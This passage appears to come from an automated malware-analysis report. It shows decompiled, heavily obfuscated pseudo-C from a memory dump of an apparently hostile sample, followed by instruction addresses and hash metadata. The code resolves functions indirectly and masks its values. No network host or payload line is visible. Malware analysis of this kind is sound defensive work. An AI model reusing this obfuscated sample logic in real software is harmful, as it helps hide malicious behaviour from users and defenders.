                  				 *_t584 =  *_t584 ^ _t348;
                  				_t112 = _t437 + 0x41d272; // 0x41d272
                  				 *_t584 =  *_t584 & 0x00000000;
                  				 *_t584 =  *_t584 ^ _t112;
                  				_t350 =  *((intOrPtr*)(_t437 + 0x41f060))(_t437, _v16);
                  				_t585 = _t584 - 0xfffffffc;
                  				 *_t114 = _t350;
                  				_v16 = _v16 + (_v12 & 0x00000000) +  *_t584;
                  				_push(_v16);
                  				_pop(_t351);
                  				_t507 = _t505;
                  				 *_t585 = _t507;
                  				_t463 =  *(_t437 + 0x41c389);
                  				_t510 = 0;
                  				if(_t463 > _t351) {
                  					_t119 = _t437 + 0x41cd88; // 0x41cd88
                  					 *_t585 =  *_t585 & 0x00000000;
                  					 *_t585 =  *_t585 ^ _t119;
                  					_t120 = _t437 + 0x41d272; // 0x41d272
                  					 *_t585 =  *_t585 & 0x00000000;
                  					 *_t585 =  *_t585 ^ _t120;
                  					_t426 =  *((intOrPtr*)(_t437 + 0x41f064))(_t560, _t463);
                  					 *(_t437 + 0x41cc5a) =  *(_t437 + 0x41cc5a) & 0x00000000;
                  					 *(_t437 + 0x41cc5a) =  *(_t437 + 0x41cc5a) | _t463 & 0x00000000 | _t426;
                  					_t463 = _t463;
                  				}
                  				_t586 = _t585 - 0xfffffffc;
                  				 *_t586 = 0 ^  *_t585;
                  				_t127 = _t437 + 0x41cb2c; // 0x41cb2c
                  				 *_t586 =  *_t586 ^ _t437;
                  				 *_t586 =  *_t586 | _t127;
                  				_t355 =  *((intOrPtr*)(_t437 + 0x41f060))(_t437, _v16);
                  				_v8 = 0;
                  				 *_t586 =  *_t586 ^ _t355;
                  				_t131 = _t437 + 0x41ca15; // 0x41ca15
                  				_v12 = _v12 & 0x00000000;
                  				 *_t586 =  *_t586 | _t131;
                  				_t357 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v8);
                  				_t465 =  *_t586;
                  				_t587 = _t586 - 0xfffffffc;
                  				_v8 = _t534;
                  				_push(_t465 + _t357);
                  				_t537 = _v8;
                  				_pop(_t358);
                  				_t540 = _t537;
                  				if((_t465 & 0x00000000 | _t537 & 0x00000000 ^  *(_t437 + 0x41c82d)) > _t358) {
                  					_t139 = _t437 + 0x41cb2c; // 0x41cb2c
                  					_v16 = _v16 & 0x00000000;
                  					 *_t587 =  *_t587 + _t139;
                  					_t143 = _t437 + 0x41ca15; // 0x41ca15
                  					 *_t587 =  *_t587 & 0x00000000;
                  					 *_t587 =  *_t587 + _t143;
                  					_t358 =  *((intOrPtr*)(_t437 + 0x41f064))(_t560, _v16);
                  				}
                  				_v12 = _t560;
                  				 *((intOrPtr*)(_t437 + 0x41c92d)) = _t358;
                  				_t563 = _v12;
                  				_t359 =  *((intOrPtr*)(_t437 + 0x41f060))();
                  				 *_t587 =  *_t587 & 0x00000000;
                  				 *_t587 =  *_t587 | _t359;
                  				_t149 = _t437 + 0x41c69d; // 0x41c69d
                  				_v16 = 0;
                  				 *_t587 =  *_t587 | _t149;
                  				_t361 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _t563);
                  				_v12 = _t510;
                  				 *(_t437 + 0x41ccdd) =  *(_t437 + 0x41ccdd) & 0x00000000;
                  				 *(_t437 + 0x41ccdd) =  *(_t437 + 0x41ccdd) | _t510 - _v12 | _t361;
                  				_t588 =  &(_t587[1]);
                  				_pop( *_t160);
                  				_t468 = _v16;
                  				 *_t588 = (_t361 & 0x00000000) +  *_t587;
                  				 *_t588 = _t468;
                  				_t164 = _t437 + 0x41c2d3; // 0x41c2d3
                  				_v16 = _v16 & 0x00000000;
                  				 *_t588 =  *_t588 | _t164;
                  				_t365 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _v12, _v8);
                  				_v12 = _t468;
                  				 *(_t437 + 0x41d1f2) = _t365;
                  				_pop( *_t172);
                  				_t473 = _v12 & 0x00000000 | _v8;
                  				_pop( *_t174);
                  				 *_t588 = _v12;
                  				_push(_t365 & 0x00000000 ^ _v16);
                  				_pop(_t514);
                  				_t516 = 0;
                  				_v8 = 0;
                  				 *_t588 =  *_t588 | _t514 + _t473;
                  				_t178 = _t437 + 0x41d35c; // 0x41d35c
                  				 *_t588 = _t178;
                  				_t180 = _t437 + 0x41cffa; // 0x41cffa
                  				 *_t588 =  *_t588 ^ _t576;
                  				 *_t588 = _t180;
                  				_t371 =  *((intOrPtr*)(_t437 + 0x41f068))(_t576, _v12, _v8);
                  				_v12 = _t516;
                  				 *(_t437 + 0x41c7e6) =  *(_t437 + 0x41c7e6) & 0x00000000;
                  				 *(_t437 + 0x41c7e6) =  *(_t437 + 0x41c7e6) | _t516 - _v12 | _t371;
                  				_t519 = _v12;
                  				_t373 = 0 ^  *_t588;
                  				_t589 =  &(_t588[1]);
                  				_v8 = _t373;
                  				_v12 = 0;
                  				 *_t589 =  *_t589 + _v8;
                  				 *_t589 = _t473 & 0x00000000 ^ (_t373 - _v8 |  *(_t437 + 0x41d1e6));
                  				_t196 = _t437 + 0x41c887; // 0x41c887
                  				 *_t589 = _t196;
                  				_t378 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v8, _v12);
                  				_v12 = _v12 & 0x00000000;
                  				 *_t589 =  *_t589 + _t378;
                  				_t202 = _t437 + 0x41c411; // 0x41c411
                  				_v16 = 0;
                  				 *_t589 =  *_t589 + _t202;
                  				_t380 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _v12);
                  				_t590 = _t589 - 0xfffffffc;
                  				 *_t590 =  *_t590 ^ _t540;
                  				_t541 = _t380;
                  				_t543 = 0;
                  				_v12 = _t563;
                  				_t566 = _v12;
                  				if((0 ^  *(_t437 + 0x41c39d)) > _t541 +  *_t589) {
                  					_t209 = _t437 + 0x41c887; // 0x41c887
                  					 *_t590 =  *_t590 & 0x00000000;
                  					 *_t590 =  *_t590 | _t209;
                  					_t210 = _t437 + 0x41c411; // 0x41c411
                  					_v12 = _v12 & 0x00000000;
                  					 *_t590 =  *_t590 | _t210;
                  					_t421 =  *((intOrPtr*)(_t437 + 0x41f064))(_v12, _t576);
                  					 *_t590 = _t543;
                  					 *((intOrPtr*)(_t437 + 0x41c9b5)) = _t421;
                  					_t543 = 0;
                  				}
                  				_t480 = 0 ^  *_t590;
                  				_t591 =  &(_t590[1]);
                  				_t383 =  *_t591;
                  				_t592 =  &(_t591[1]);
                  				if(_t480 > _t383) {
                  					_t216 = _t437 + 0x41d2f2; // 0x41d2f2
                  					_v16 = _v16 & 0x00000000;
                  					 *_t592 =  *_t592 ^ _t216;
                  					_t220 = _t437 + 0x41d16f; // 0x41d16f
                  					_v16 = 0;
                  					 *_t592 =  *_t592 ^ _t220;
                  					_t383 =  *((intOrPtr*)(_t437 + 0x41f064))(_v16, _v16);
                  				}
                  				 *_t592 = _t576;
                  				 *(_t437 + 0x41c0d6) = 0 ^ _t383;
                  				_t579 = 0;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t592 =  *_t592 | _t566;
                  				_t228 = _t437 + 0x41cd35; // 0x41cd35
                  				 *_t592 =  *_t592 ^ _t480;
                  				 *_t592 =  *_t592 + _t228;
                  				_t229 = _t437 + 0x41ca62; // 0x41ca62
                  				_v16 = 0;
                  				 *_t592 =  *_t592 + _t229;
                  				_t386 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _t480, _v12);
                  				_v16 = _t543;
                  				 *(_t437 + 0x41cb3a) =  *(_t437 + 0x41cb3a) & 0x00000000;
                  				 *(_t437 + 0x41cb3a) =  *(_t437 + 0x41cb3a) ^ (_t543 - _v16 | _t386);
                  				_t546 = _v16;
                  				_t483 = _t480;
                  				_v12 = 0;
                  				 *_t592 =  *_t592 | _t386 & 0x00000000 ^ (_t480 & 0x00000000 | _a4);
                  				_t243 = _t437 + 0x41c84c; // 0x41c84c
                  				_v12 = _v12 & 0x00000000;
                  				 *_t592 =  *_t592 | _t243;
                  				_t390 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v12);
                  				_v16 = _t519;
                  				 *((intOrPtr*)(_t437 + 0x41d2c7)) = _t390;
                  				_t522 = _v16;
                  				_t593 = _t592 - 0xfffffffc;
                  				 *_t593 =  *_t593 - _t437;
                  				 *_t593 =  *_t592 - 1;
                  				_t251 = _t437 + 0x41ceef; // 0x41ceef
                  				_v16 = 0;
                  				 *_t593 =  *_t593 | _t251;
                  				_t254 = _t437 + 0x41c9c8; // 0x41c9c8
                  				 *_t593 =  *_t593 - _t522;
                  				 *_t593 = _t254;
                  				_t396 =  *((intOrPtr*)(_t437 + 0x41f068))(_t522, _v16, _t437);
                  				_v16 = _t522;
                  				 *(_t437 + 0x41d00d) =  *(_t437 + 0x41d00d) & 0x00000000;
                  				 *(_t437 + 0x41d00d) =  *(_t437 + 0x41d00d) | _t522 ^ _v16 | _t396;
                  				_t525 = _v16;
                  				_t398 =  *_t593;
                  				_t594 = _t593 - 0xfffffffc;
                  				if(_t398 > 0) {
                  					if(_a12 != 0) {
                  						_t402 = _t398;
                  						 *_t301 = _t483 & 0x00000000 | _t398 ^  *_t594 ^ _a12;
                  						_v12 = _v12 + _t402;
                  						_push(_v12);
                  						_pop(_t486);
                  						_t570 = _t566;
                  						 *_t594 =  *_t594 ^ _t486;
                  						_t487 = _t437;
                  						_t488 = _t487 & _a8;
                  						 *_t306 = _t570;
                  						_v8 = _v8 + _t488;
                  						_push(_v8);
                  						_pop(_t566);
                  						_t437 = _t437;
                  						 *_t594 =  *_t594 & 0x00000000;
                  						 *_t594 =  *_t594 + _t566;
                  						 *_t594 =  *_t594 ^ _t579;
                  						 *_t594 =  *_t594 ^ _t488;
                  						 *_t594 = _t402;
                  						_t398 = E030531B3(_t437, _t525, _t546, _t566, _v16, _t579, _t488);
                  					}
                  					_push(_t437);
                  					return _t398 ^ _t398;
                  				} else {
                  					 *_t594 =  *_t594 & 0x00000000;
                  					 *_t594 =  *_t594 | _t398;
                  					_t263 = _t437 + 0x41cfc3; // 0x41cfc3
                  					_v16 = _v16 & 0x00000000;
                  					 *_t594 =  *_t594 ^ _t263;
                  					_t267 = _t437 + 0x41c769; // 0x41c769
                  					 *_t594 =  *_t594 & 0x00000000;
                  					 *_t594 =  *_t594 ^ _t267;
                  					_t405 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _t483);
                  					_v16 = _t483;
                  					 *(_t437 + 0x41d0ea) =  *(_t437 + 0x41d0ea) & 0x00000000;
                  					 *(_t437 + 0x41d0ea) =  *(_t437 + 0x41d0ea) ^ (_t483 & 0x00000000 | _t405);
                  					 *_t275 = _t525;
                  					_t596 = _t594 - 0xfffffffc;
                  					 *_t596 =  *_t596 - _t437;
                  					 *_t596 =  *_t596 | _v16;
                  					_t277 = _t437 + 0x41cd95; // 0x41cd95
                  					 *_t596 =  *_t596 ^ _t525;
                  					 *_t596 = _t277;
                  					_t408 =  *((intOrPtr*)(_t437 + 0x41f060))(_t525, _t437);
                  					 *_t596 =  *_t596 & 0x00000000;
                  					 *_t596 =  *_t596 + _t408;
                  					_t279 = _t437 + 0x41cbf8; // 0x41cbf8
                  					 *_t596 = _t279;
                  					_t410 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v16);
                  					_pop( *_t282);
                  					 *_t596 = _t437;
                  					_t442 = _t410;
                  					_t444 = 0;
                  					_push(_t546);
                  					if((0 + _v12 & 0x00000000 ^ (_t546 ^  *_t596 |  *(_t444 + 0x41c691))) > _t442 + 0 + _v12) {
                  						_t285 = _t444 + 0x41cd95; // 0x41cd95
                  						 *_t596 = _t285;
                  						_t287 = _t444 + 0x41cbf8; // 0x41cbf8
                  						_v12 = _v12 & 0x00000000;
                  						 *_t596 =  *_t596 | _t287;
                  						_t416 =  *((intOrPtr*)(_t444 + 0x41f064))(_v12, _v16);
                  						_v8 = _t525;
                  						 *(_t444 + 0x41d309) =  *(_t444 + 0x41d309) & 0x00000000;
                  						 *(_t444 + 0x41d309) =  *(_t444 + 0x41d309) | _t525 ^ _v8 | _t416;
                  					}
                  					return  *_t596;
                  				}
                  			}














































































































                  0x030531b3
                  0x030531b3
                  0x030531b3
                  0x030531b9
                  0x030531bf
                  0x030531c2
                  0x030531c5
                  0x030531cb
                  0x030531cc
                  0x030531cf
                  0x030531d2
                  0x030531d8
                  0x030531df
                  0x030531e2
                  0x030531e5
                  0x030531ed
                  0x030531f0
                  0x030531f5
                  0x030531f9
                  0x030531fc
                  0x030531fe
                  0x030531ff
                  0x0305320e
                  0x03053210
                  0x03053215
                  0x03053217
                  0x0305321d
                  0x03053224
                  0x03053227
                  0x0305322a
                  0x03053230
                  0x03053231
                  0x03053234
                  0x03053237
                  0x03053237
                  0x0305323d
                  0x03053245
                  0x0305324c
                  0x03053252
                  0x03053255
                  0x0305325c
                  0x03053260
                  0x03053263
                  0x03053269
                  0x03053270
                  0x03053273
                  0x0305327a
                  0x0305327e
                  0x03053281
                  0x03053288
                  0x0305328c
                  0x0305328f
                  0x03053295
                  0x0305329d
                  0x030532a1
                  0x030532a6
                  0x030532a9
                  0x030532b4
                  0x030532b6
                  0x030532b9
                  0x030532bb
                  0x030532c2
                  0x030532c5
                  0x030532c8
                  0x030532ce
                  0x030532d8
                  0x030532db
                  0x030532e1
                  0x030532e8
                  0x030532ee
                  0x030532ee
                  0x030532f6
                  0x030532fa
                  0x030532fd
                  0x03053300
                  0x03053307
                  0x0305330b
                  0x0305330e
                  0x03053315
                  0x03053319
                  0x0305331c
                  0x03053323
                  0x03053326
                  0x03053329
                  0x03053335
                  0x03053338
                  0x0305333f
                  0x03053342
                  0x03053345
                  0x03053348
                  0x03053349
                  0x0305334a
                  0x03053359
                  0x0305335b
                  0x03053360
                  0x03053362
                  0x03053369
                  0x0305336d
                  0x03053370
                  0x03053377
                  0x0305337a
                  0x0305337d
                  0x0305337d
                  0x03053384
                  0x03053387
                  0x0305338a
                  0x03053390
                  0x03053396
                  0x0305339d
                  0x030533a0
                  0x030533a7
                  0x030533aa
                  0x030533ad
                  0x030533b6
                  0x030533b9
                  0x030533c2
                  0x030533c5
                  0x030533d4
                  0x030533db
                  0x030533de
                  0x030533e1
                  0x030533e4
                  0x030533e5
                  0x030533e6
                  0x030533f1
                  0x030533f3
                  0x030533f8
                  0x030533fa
                  0x03053400
                  0x03053407
                  0x0305340a
                  0x03053410
                  0x03053417
                  0x0305341a
                  0x03053420
                  0x03053427
                  0x0305342d
                  0x0305342d
                  0x03053432
                  0x03053439
                  0x0305343c
                  0x0305343f
                  0x03053445
                  0x0305344f
                  0x03053452
                  0x03053458
                  0x03053462
                  0x03053465
                  0x0305346b
                  0x03053473
                  0x0305347a
                  0x03053483
                  0x03053489
                  0x03053490
                  0x03053493
                  0x0305349a
                  0x0305349e
                  0x030534a1
                  0x030534a7
                  0x030534ae
                  0x030534b1
                  0x030534b8
                  0x030534bc
                  0x030534bf
                  0x030534ce
                  0x030534d5
                  0x030534d8
                  0x030534db
                  0x030534de
                  0x030534df
                  0x030534e2
                  0x030534ed
                  0x030534ef
                  0x030534f2
                  0x030534f4
                  0x030534fb
                  0x030534ff
                  0x03053502
                  0x03053509
                  0x0305350d
                  0x03053510
                  0x0305351c
                  0x03053523
                  0x03053529
                  0x03053529
                  0x0305352f
                  0x03053535
                  0x03053538
                  0x0305353f
                  0x03053542
                  0x03053545
                  0x0305354b
                  0x03053555
                  0x03053558
                  0x0305355e
                  0x03053565
                  0x03053568
                  0x03053574
                  0x03053577
                  0x0305357a
                  0x03053581
                  0x03053582
                  0x03053585
                  0x03053595
                  0x03053598
                  0x0305359a
                  0x030535a0
                  0x030535a7
                  0x030535aa
                  0x030535b1
                  0x030535b5
                  0x030535b8
                  0x030535b8
                  0x030535be
                  0x030535c5
                  0x030535cb
                  0x030535ce
                  0x030535d5
                  0x030535d9
                  0x030535dc
                  0x030535e2
                  0x030535ec
                  0x030535ef
                  0x030535f5
                  0x030535fd
                  0x03053604
                  0x03053616
                  0x03053619
                  0x0305361c
                  0x03053622
                  0x03053628
                  0x0305362b
                  0x03053631
                  0x03053638
                  0x0305363b
                  0x03053641
                  0x03053648
                  0x03053657
                  0x0305365a
                  0x03053663
                  0x0305366b
                  0x0305366e
                  0x0305366f
                  0x03053674
                  0x03053675
                  0x0305367f
                  0x03053682
                  0x0305368b
                  0x0305368e
                  0x03053695
                  0x03053698
                  0x0305369b
                  0x030536a1
                  0x030536a9
                  0x030536b0
                  0x030536b6
                  0x030536bb
                  0x030536be
                  0x030536c1
                  0x030536d5
                  0x030536df
                  0x030536e5
                  0x030536e8
                  0x030536f1
                  0x030536f4
                  0x030536fa
                  0x03053701
                  0x03053704
                  0x0305370a
                  0x03053714
                  0x03053717
                  0x03053722
                  0x03053727
                  0x0305372b
                  0x03053730
                  0x03053731
                  0x0305373e
                  0x03053743
                  0x03053745
                  0x0305374c
                  0x03053750
                  0x03053753
                  0x03053759
                  0x03053760
                  0x03053763
                  0x0305376b
                  0x03053772
                  0x03053778
                  0x03053778
                  0x0305377b
                  0x0305377e
                  0x03053783
                  0x03053786
                  0x0305378b
                  0x0305378d
                  0x03053793
                  0x0305379a
                  0x0305379d
                  0x030537a3
                  0x030537ad
                  0x030537b0
                  0x030537b0
                  0x030537b8
                  0x030537bf
                  0x030537c5
                  0x030537c6
                  0x030537cd
                  0x030537d0
                  0x030537d7
                  0x030537da
                  0x030537dd
                  0x030537e3
                  0x030537ed
                  0x030537f0
                  0x030537f6
                  0x030537fe
                  0x03053805
                  0x0305380b
                  0x0305381a
                  0x0305381b
                  0x03053825
                  0x03053828
                  0x0305382e
                  0x03053835
                  0x03053838
                  0x0305383e
                  0x03053845
                  0x0305384b
                  0x03053853
                  0x03053858
                  0x0305385b
                  0x0305385e
                  0x03053864
                  0x0305386e
                  0x03053871
                  0x03053878
                  0x0305387b
                  0x0305387e
                  0x03053884
                  0x0305388c
                  0x03053893
                  0x03053899
                  0x030538a2
                  0x030538a5
                  0x030538ab
                  0x030539ad
                  0x030539bb
                  0x030539c0
                  0x030539c3
                  0x030539c6
                  0x030539c9
                  0x030539ca
                  0x030539cc
                  0x030539cf
                  0x030539d0
                  0x030539d7
                  0x030539da
                  0x030539dd
                  0x030539e0
                  0x030539e1
                  0x030539e3
                  0x030539e7
                  0x030539eb
                  0x030539ee
                  0x030539f4
                  0x030539f7
                  0x030539f7
                  0x030539fc
                  0x03053a11
                  0x030538b1
                  0x030538b2
                  0x030538b6
                  0x030538b9
                  0x030538bf
                  0x030538c6
                  0x030538c9
                  0x030538d0
                  0x030538d4
                  0x030538d7
                  0x030538dd
                  0x030538e5
                  0x030538ec
                  0x030538f5
                  0x03053904
                  0x03053908
                  0x0305390b
                  0x0305390e
                  0x03053915
                  0x03053918
                  0x0305391b
                  0x03053922
                  0x03053926
                  0x03053929
                  0x03053932
                  0x03053935
                  0x0305393d
                  0x03053945
                  0x03053949
                  0x0305394e
                  0x0305394f
                  0x03053961
                  0x03053963
                  0x0305396c
                  0x0305396f
                  0x03053975
                  0x0305397c
                  0x0305397f
                  0x03053985
                  0x0305398d
                  0x03053994
                  0x0305399a
                  0x030539a6
                  0x030539a6

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41702c0559bb7f5a073f0754972d7e78843a10d494ddda559bbe32eb0d58a14d
                  • Instruction ID: e88c45f2fbfdbc915d8e3a6776f61ee328534b586ea927666993fb58f084c8e7
                  • Opcode Fuzzy Hash: 41702c0559bb7f5a073f0754972d7e78843a10d494ddda559bbe32eb0d58a14d
                  • Instruction Fuzzy Hash: 55521572944608EFEB04DFA4C88A7AEBBF1FF08310F1585AED886EA145D7345664CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E03053FAB(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
                  				signed int _t346;
                  				signed int _t351;
                  				signed int _t352;
                  				signed int _t355;
                  				void* _t359;
                  				void* _t361;
                  				signed int _t362;
                  				signed int _t367;
                  				void* _t369;
                  				void* _t370;
                  				signed int _t374;
                  				signed int _t377;
                  				signed int _t380;
                  				signed int _t385;
                  				void* _t387;
                  				void* _t389;
                  				intOrPtr _t390;
                  				void _t393;
                  				signed int _t397;
                  				intOrPtr _t403;
                  				signed int _t408;
                  				signed int _t410;
                  				signed int _t415;
                  				signed int _t418;
                  				void* _t420;
                  				signed int _t421;
                  				void* _t424;
                  				signed int _t429;
                  				signed int _t430;
                  				signed int _t433;
                  				void* _t437;
                  				void* _t439;
                  				signed int _t440;
                  				signed int _t443;
                  				intOrPtr _t445;
                  				signed int _t451;
                  				signed int _t454;
                  				signed int _t457;
                  				signed int _t459;
                  				signed int _t471;
                  				signed int _t473;
                  				signed int _t475;
                  				signed int _t478;
                  				void* _t481;
                  				signed int _t488;
                  				signed int _t489;
                  				signed int _t498;
                  				signed int _t500;
                  				signed int _t502;
                  				signed int _t504;
                  				signed int _t510;
                  				signed int _t513;
                  				void* _t514;
                  				signed int _t516;
                  				signed int _t519;
                  				signed int _t520;
                  				signed int _t525;
                  				signed int _t528;
                  				signed int _t530;
                  				signed int _t532;
                  				signed int _t534;
                  				signed int _t537;
                  				signed int _t540;
                  				signed int _t544;
                  				signed int _t548;
                  				signed int _t553;
                  				signed int _t559;
                  				signed int _t562;
                  				signed int _t565;
                  				void* _t570;
                  				void* _t577;
                  				signed int _t579;
                  				signed int _t582;
                  				signed int _t585;
                  				signed int _t590;
                  				void* _t591;
                  				signed int _t595;
                  				signed int _t598;
                  				signed int _t601;
                  				signed int _t604;
                  				signed int* _t608;
                  				signed int* _t609;
                  				signed int* _t610;
                  				signed int* _t611;
                  				signed int* _t612;
                  				signed int* _t613;
                  				signed int* _t614;
                  				signed int* _t615;
                  				signed int* _t616;
                  				signed int* _t617;
                  				signed int* _t621;
                  				signed int* _t622;
                  				signed int* _t623;
                  
                  				_t585 = __esi;
                  				_t454 = __ebx;
                  				 *(_t598 - 0x1c) =  *(_t598 - 0x1c) & 0x00000000;
                  				_push( *(_t598 - 0x1c));
                  				 *_t608 =  *_t608 + __ebx + 0x41c4c0;
                  				_push( *((intOrPtr*)(__ebx + 0x41f060))());
                  				_pop( *_t6);
                  				_push( *(_t598 - 0x20));
                  				_pop( *_t8);
                  				_push(__ebx);
                  				 *_t608 =  *_t608 & 0x00000000;
                  				 *_t608 =  *_t608 | __ebx + 0x0041cf44;
                  				_push( *(_t598 - 0x1c));
                  				 *_t608 = __ebx + 0x41d05b;
                  				_t346 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				 *(_t598 - 0x1c) = __edi;
                  				 *(__ebx + 0x41cd5b) =  *(__ebx + 0x41cd5b) & 0x00000000;
                  				 *(__ebx + 0x41cd5b) =  *(__ebx + 0x41cd5b) ^ (__edi -  *(_t598 - 0x1c) | _t346);
                  				_t559 =  *(_t598 - 0x1c);
                  				_t609 = _t608 - 0xfffffffc;
                  				 *(_t598 - 0x1c) = 0;
                  				_push( *(_t598 - 0x1c));
                  				 *_t609 =  *_t609 |  *_t608;
                  				_push( *(_t598 - 0x1c));
                  				 *_t609 = __ebx + 0x41c0d0;
                  				 *(_t598 - 0x20) =  *(_t598 - 0x20) & 0x00000000;
                  				_push( *(_t598 - 0x20));
                  				 *_t609 =  *_t609 | __ebx + 0x0041c99a;
                  				_t351 =  *((intOrPtr*)(__ebx + 0x41f068))();
                  				 *(_t598 - 0x20) = __ecx;
                  				 *(__ebx + 0x41c6ff) = 0 ^ _t351;
                  				_t352 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_push( *(_t598 - 0x1c));
                  				 *_t609 = _t352;
                  				_push(__edx);
                  				 *_t609 =  *_t609 ^ __edx;
                  				 *_t609 =  *_t609 ^ __ebx + 0x0041d1ce;
                  				 *(_t598 - 0x20) = 0;
                  				_push( *(_t598 - 0x20));
                  				 *_t609 =  *_t609 ^ __ebx + 0x0041c36e;
                  				_t355 =  *((intOrPtr*)(__ebx + 0x41f068))();
                  				 *(_t598 - 0x24) = __edx;
                  				 *(__ebx + 0x41c65d) = 0 ^ _t355;
                  				_t510 =  *(_t598 - 0x24);
                  				_t610 = _t609 - 0xfffffffc;
                  				 *(__ebx + 0x41c125) =  *(__ebx + 0x41c125) & 0x00000000;
                  				 *(__ebx + 0x41c125) =  *(__ebx + 0x41c125) | _t510 -  *_t610 ^ (_t355 & 0x00000000) +  *_t609;
                  				_t513 = _t510;
                  				_push(_t513);
                  				 *_t610 =  *_t610 & 0x00000000;
                  				 *_t610 =  *_t610 ^ __ebx + 0x0041c369;
                  				_t359 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				 *(_t598 - 0x24) = 0;
                  				_push( *(_t598 - 0x24));
                  				 *_t610 =  *_t610 + _t359;
                  				 *(_t598 - 0x24) = 0;
                  				_push( *(_t598 - 0x24));
                  				 *_t610 =  *_t610 ^ __ebx + 0x0041c4d6;
                  				_t361 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_t611 = _t610 - 0xfffffffc;
                  				 *_t611 =  *_t611 | _t513;
                  				_t514 = _t361;
                  				_t362 = _t514 + ( *(_t598 - 0x20) & 0x00000000 |  *_t610);
                  				_t516 = 0;
                  				 *_t611 = _t516;
                  				_t471 = 0 ^  *(__ebx + 0x41c434);
                  				_t519 = 0;
                  				if(_t471 > _t362) {
                  					_push(_t471);
                  					 *_t611 =  *_t611 ^ _t471;
                  					 *_t611 =  *_t611 + __ebx + 0x41c369;
                  					 *(_t598 - 0x1c) = 0;
                  					_push( *(_t598 - 0x1c));
                  					 *_t611 =  *_t611 ^ __ebx + 0x0041c4d6;
                  					_t362 =  *((intOrPtr*)(__ebx + 0x41f064))();
                  				}
                  				 *(_t454 + 0x41c391) =  *(_t454 + 0x41c391) & 0x00000000;
                  				 *(_t454 + 0x41c391) =  *(_t454 + 0x41c391) ^ _t598 ^  *_t611 ^ _t362;
                  				_t601 = _t598;
                  				if( *((intOrPtr*)(_t601 - 0x10)) != 2) {
                  					if( *((intOrPtr*)(_t601 - 0x10)) == 4) {
                  						_t156 = _t454 + 0x41d1be; // 0x41d1be
                  						 *_t611 = _t156;
                  						_t158 = _t454 + 0x41c0a8; // 0x41c0a8
                  						 *_t611 =  *_t611 & 0x00000000;
                  						 *_t611 =  *_t611 ^ _t158;
                  						_push( *((intOrPtr*)(_t454 + 0x41f068))(_t585,  *(_t601 - 0x24)));
                  						_pop( *_t160);
                  						_push( *(_t601 - 0x20));
                  						_pop( *_t162);
                  						 *((intOrPtr*)(_t601 - 8)) = 1;
                  						_t164 = _t454 + 0x41c6f8; // 0x41c6f8
                  						 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
                  						 *_t611 =  *_t611 ^ _t164;
                  						_t408 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20));
                  						 *(_t601 - 0x20) = _t519;
                  						 *(_t454 + 0x41c674) =  *(_t454 + 0x41c674) & 0x00000000;
                  						 *(_t454 + 0x41c674) =  *(_t454 + 0x41c674) | _t519 ^  *(_t601 - 0x20) | _t408;
                  						_t548 =  *(_t601 - 0x20);
                  						 *((intOrPtr*)(_t601 - 0xc)) = 0x55;
                  						_t177 = _t454 + 0x41c356; // 0x41c356
                  						 *(_t601 - 0x1c) =  *(_t601 - 0x1c) & 0x00000000;
                  						 *_t611 =  *_t611 | _t177;
                  						_t410 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x1c));
                  						 *(_t601 - 0x24) = _t559;
                  						 *(_t454 + 0x41cd7d) =  *(_t454 + 0x41cd7d) & 0x00000000;
                  						 *(_t454 + 0x41cd7d) =  *(_t454 + 0x41cd7d) | _t559 & 0x00000000 ^ _t410;
                  						_t559 =  *(_t601 - 0x24);
                  						 *((intOrPtr*)(_t601 - 0x18)) = 2;
                  						_t189 = _t454 + 0x41cc3e; // 0x41cc3e
                  						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
                  						 *_t611 =  *_t611 ^ _t189;
                  						_t193 = _t454 + 0x41cf5b; // 0x41cf5b
                  						 *_t611 =  *_t611 ^ _t585;
                  						 *_t611 = _t193;
                  						_t362 =  *((intOrPtr*)(_t454 + 0x41f068))(_t585,  *(_t601 - 0x24));
                  						 *(_t601 - 0x20) = _t548;
                  						 *(_t454 + 0x41c1cd) =  *(_t454 + 0x41c1cd) & 0x00000000;
                  						 *(_t454 + 0x41c1cd) =  *(_t454 + 0x41c1cd) | _t548 & 0x00000000 | _t362;
                  						_t519 =  *(_t601 - 0x20);
                  					}
                  				} else {
                  					_t65 = _t454 + 0x41cb7a; // 0x41cb7a
                  					 *(_t601 - 0x1c) = 0;
                  					 *_t611 =  *_t611 + _t65;
                  					_t68 = _t454 + 0x41c8ec; // 0x41c8ec
                  					 *(_t601 - 0x24) = 0;
                  					 *_t611 =  *_t611 ^ _t68;
                  					_t415 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t601 - 0x24),  *(_t601 - 0x1c));
                  					 *(_t454 + 0x41c6f4) =  *(_t454 + 0x41c6f4) & 0x00000000;
                  					 *(_t454 + 0x41c6f4) =  *(_t454 + 0x41c6f4) ^ (_t585 & 0x00000000 | _t415);
                  					_t595 = _t585;
                  					_t76 = _t454 + 0x41c379; // 0x41c379
                  					 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
                  					 *_t611 =  *_t611 + _t76;
                  					_t80 = _t454 + 0x41c532; // 0x41c532
                  					 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
                  					 *_t611 =  *_t611 | _t80;
